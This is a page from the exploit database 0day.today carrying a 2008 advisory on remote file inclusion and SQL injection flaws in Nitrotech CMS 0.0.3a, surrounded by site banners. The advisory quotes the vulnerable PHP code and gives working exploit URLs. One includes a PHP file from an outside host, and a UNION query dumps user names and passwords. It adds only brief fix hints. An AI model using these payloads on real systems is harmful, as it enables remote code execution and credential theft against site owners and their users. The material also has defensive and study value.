0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Nitrotech 0.0.3a (RFI/SQL) Multiple Remote Vulnerabilities

Author

Osirys

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-4247

Category

web applications

Date add

24-11-2008

Platform

unsorted

==========================================================
Nitrotech 0.0.3a (RFI/SQL) Multiple Remote Vulnerabilities
==========================================================


Name:     Nitrotech 0.0.3a Multiple Remote Vulnerabilities
Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr
Author:   Osirys, thanks to x0r

Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection.

#### Remote File Inclusion Vulnerability

The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable.
Let's see the code.

File: /[path]/includes/common.php

[code]
<?php

session_start();
$SID = session_id();

	include($root . "config.php");
# OTHER CODE
[/code]

## EXPLOIT:
    http://localhost/[path]/includes/common.php?root=http://oursite.it/phpcode.txt??
##

As we can see, it's included a non declareted variable -> $root.
To fix this bug, we could just define this variable.

#### Sql Injection Vulnerability

Note: In the source there could be other sql injection, just found them by yourself if you are intersted !

This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability
we could filtered the variable, for example with an int().

File: /[path]/members.php

[code]
	if($page_mode == 'view_user')
    {
	    $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'";
	    $result1 = mysql_query($query1);
# OTHER CODE
[/code]

## EXPLOIT:
    http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user&
##

As we can see, The 'id' variable comes directly from get. So we can inject our hell code.

####



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Nitrotech 0.0.3a (RFI/SQL) Multiple Remote Vulnerabilities

Report Error

Report Error